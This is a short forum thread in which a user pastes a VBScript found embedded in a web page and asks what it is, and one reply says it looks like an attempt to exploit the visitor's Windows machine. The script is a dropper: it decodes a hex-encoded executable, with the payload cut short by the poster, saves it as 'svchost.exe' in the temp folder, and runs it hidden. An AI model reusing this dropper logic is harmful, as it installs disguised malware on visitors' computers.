K
K
KronosHD2015-06-10 18:14:44
VBScript
KronosHD, 2015-06-10 18:14:44

What it is? What is VBS?

<script language="VBScript"><!--
DropFileName = "svchost.exe"
WriteData = "4D5A50000200000004000F00FFFF0000B80000000000000040001A00000000000000000000000000000000000000000000000000000000000000000040000000504500004C010800F4F643330000000000000000E0000E010B0102040024000000A8000000000000001C000000100000004000000000400000100000000200000400000000000000040000000000000000300100000400007C2001000200000000001000001000000000100000100000000000001000000000D00000E101000000400000E604000000000100B41600000000000000000000000000000000000000200100E40000007C31000020000000000000000000000000000000000000000000000000000000002200001C000000000000000000000000000000000000000000000000000000000000000000000000000000000000002E7465787400000057230000001000000024000000040000000000000000000000000000200000602E78646174610000B5000000004000000002000000280000000000000000000000000000400000402E646174610000008E0000000050000000020000002A0000000000000000000000000000400000C02E6F646174 ТУТ ОЧЕНЬ МНОГО КОДА. Я СОКРАТИЛ"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></script>

I don't know how I got to the site.

Answer the question

In order to leave comments, you need to log in

1 answer(s)
M
Melkij, 2015-06-10
@melkij

Visual Basic.
It looks like an attempt to exploit some vulnerability of the client's Windows machine.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question